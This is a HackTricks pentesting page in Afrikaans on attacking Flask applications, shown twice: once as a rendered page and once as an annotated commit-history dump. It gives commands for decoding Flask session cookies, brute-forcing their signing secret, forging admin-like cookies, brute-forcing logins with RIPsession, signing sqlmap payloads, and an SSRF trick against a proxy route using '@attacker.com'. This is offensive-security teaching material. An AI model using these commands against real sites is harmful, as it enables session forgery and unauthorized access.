hacktricks/network-services-pentesting/pentesting-web/flask.md

# Flask

<details>

<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>

<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>

Gebruik [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) om maklik te bou en **werkstrome outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\
Kry Vandaag Toegang:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}

**Waarskynlik as jy 'n CTF speel, sal 'n Flask-toepassing verband hou met** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**

## Koekies

Verstek koekiesessienaam is **`session`**.

### Ontleder

Aanlyn Flask-koekiesontleder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)

#### Handleiding

Kry die eerste deel van die koekie tot by die eerste punt en Base64-ontsleutel dit>
```bash
echo "ImhlbGxvIg" | base64 -d
```
Die koekie word ook onderteken met behulp van 'n wagwoord

### **Flask-Unsign**

Opdraglynwerktuig om sessiekoekies van 'n Flask-toepassing te haal, te ontsleutel, te kragtig aan te val en te skep deur geheime sleutels te raai.

{% embed url="https://pypi.org/project/flask-unsign/" %}
```bash
pip3 install flask-unsign
```
#### **Dekodeer Koekie**
```bash
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
#### **Brute Force**
```bash
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
```
#### **Ondertekening**
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### Ondertekening met behulp van ou erfenis (ou weergawes)
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
### **RIPsession**

Opdraglynwerktuig om webwerwe te kragtig aan te val deur koekies te gebruik wat geskep is met flask-unsign.

{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```
### SQLi in Flask sessie koekie met SQLmap

[**Hierdie voorbeeld**](../../pentesting-web/sql-injection/sqlmap/#eval) gebruik sqlmap se `eval` opsie om **outomaties sqlmap payloads te teken** vir flask deur 'n bekende geheim te gebruik.

## Flask Proksi na SSRF

[**In hierdie uiteensetting**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) word verduidelik hoe Flask 'n versoek toelaat wat begin met die karakter "@":
```http
GET @/ HTTP/1.1
Host: target.com
Connection: close
```
Watter in die volgende scenario:
```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)
```
Kon toelaat om iets soos "@attacker.com" in te voer om 'n **SSRF** te veroorsaak.

<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>

Gebruik [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) om maklik te bou en **werkstrome outomaties** aangedryf deur die wêreld se **mees gevorderde** gemeenskaplike gereedskap.\
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}

<details>

<summary><strong>Leer AWS hak van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **laai HackTricks in PDF af** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
GitBook: [#3200] No subject 2022-05-11 15:39:42 +00:00			`# Flask`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Ander maniere om HackTricks te ondersteun:`
arte 2023-12-31 02:24:39 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`* As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die [INSKRYWINGSPLANNE](https://github.com/sponsors/carlospolop)!`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`* Ontdek [Die PEASS Familie](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Sluit aan by die 💬 [Discord-groep](https://discord.gg/hRep4RUj7f) of die [telegram-groep](https://t.me/peass) of volg ons op Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Deel jou haktruuks deur PR's in te dien by die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github-opslag.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Gebruik [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) om maklik te bou en werkstrome outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapshulpmiddels.\`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Kry Vandaag Toegang:`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`Waarskynlik as jy 'n CTF speel, sal 'n Flask-toepassing verband hou met [SSTI](../../pentesting-web/ssti-server-side-template-injection/).`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`## Koekies`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			Verstek koekiesessienaam is `session`.
GitBook: [master] one page modified 2020-11-22 23:24:53 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`### Ontleder`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Aanlyn Flask-koekiesontleder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`#### Handleiding`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Kry die eerste deel van die koekie tot by die eerste punt en Base64-ontsleutel dit>`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`echo "ImhlbGxvIg" \| base64 -d`
			```
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`Die koekie word ook onderteken met behulp van 'n wagwoord`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#3200] No subject 2022-05-11 15:39:42 +00:00			`### Flask-Unsign`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Opdraglynwerktuig om sessiekoekies van 'n Flask-toepassing te haal, te ontsleutel, te kragtig aan te val en te skep deur geheime sleutels te raai.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`{% embed url="https://pypi.org/project/flask-unsign/" %}`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`pip3 install flask-unsign`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`#### Dekodeer Koekie`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'`
			```
GitBook: [#3200] No subject 2022-05-11 15:39:42 +00:00			`#### Brute Force`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [#3200] No subject 2022-05-11 15:39:42 +00:00			`flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`#### Ondertekening`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'`
			```
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`#### Ondertekening met behulp van ou erfenis (ou weergawes)`
GitBook: [master] one page modified 2020-11-22 21:41:06 +00:00			```bash
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy`
			```
Add RIPsession tool. I made this tool, so maybe it will help someone. :) 2022-06-10 15:00:22 +04:00			`### RIPsession`
GitBook: [#3522] No subject 2022-09-30 10:27:15 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`Opdraglynwerktuig om webwerwe te kragtig aan te val deur koekies te gebruik wat geskep is met flask-unsign.`
Add RIPsession tool. I made this tool, so maybe it will help someone. :) 2022-06-10 15:00:22 +04:00
GitBook: [#3522] No subject 2022-09-30 10:27:15 +00:00			`{% embed url="https://github.com/Tagvi/ripsession" %}`
Add RIPsession tool. I made this tool, so maybe it will help someone. :) 2022-06-10 15:00:22 +04:00			```bash
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt`
Add RIPsession tool. I made this tool, so maybe it will help someone. :) 2022-06-10 15:00:22 +04:00			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`### SQLi in Flask sessie koekie met SQLmap`
Add RIPsession tool. I made this tool, so maybe it will help someone. :) 2022-06-10 15:00:22 +04:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			[Hierdie voorbeeld](../../pentesting-web/sql-injection/sqlmap/#eval) gebruik sqlmap se `eval` opsie om outomaties sqlmap payloads te teken vir flask deur 'n bekende geheim te gebruik.
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`## Flask Proksi na SSRF`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`[In hierdie uiteensetting](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) word verduidelik hoe Flask 'n versoek toelaat wat begin met die karakter "@":`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00			```http
			`GET @/ HTTP/1.1`
			`Host: target.com`
			`Connection: close`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Watter in die volgende scenario:`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00			```python
			`from flask import Flask`
			`from requests import get`

			`app = Flask('__main__')`
			`SITE_NAME = 'https://google.com/'`

			`@app.route('/', defaults={'path': ''})`
			`@app.route('/<path:path>')`
			`def proxy(path):`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`return get(f'{SITE_NAME}{path}').content`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
			`app.run(host='0.0.0.0', port=8080)`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Kon toelaat om iets soos "@attacker.com" in te voer om 'n SSRF te veroorsaak.`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`<figure><img src="../../.gitbook/assets/image (515).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`Gebruik [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) om maklik te bou en werkstrome outomaties aangedryf deur die wêreld se mees gevorderde gemeenskaplike gereedskap.\`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 05:33:57 +00:00			`Kry Toegang Vandag:`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}`
GitBook: [#3240] No subject 2022-06-06 22:28:05 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`<summary><strong>Leer AWS hak van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`Ander maniere om HackTricks te ondersteun:`
arte 2023-12-31 02:24:39 +01:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:31:04 +00:00			`* As jy wil sien jou maatskappy geadverteer in HackTricks of laai HackTricks in PDF af Kyk na die [INSKRYWINGSPLANNE](https://github.com/sponsors/carlospolop)!`
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`* Kry die [amptelike PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind 2024-05-05 13:52:34 +00:00			`* Ontdek [Die PEASS Familie](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Deel jou haktruuks deur PRs in te dien by die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`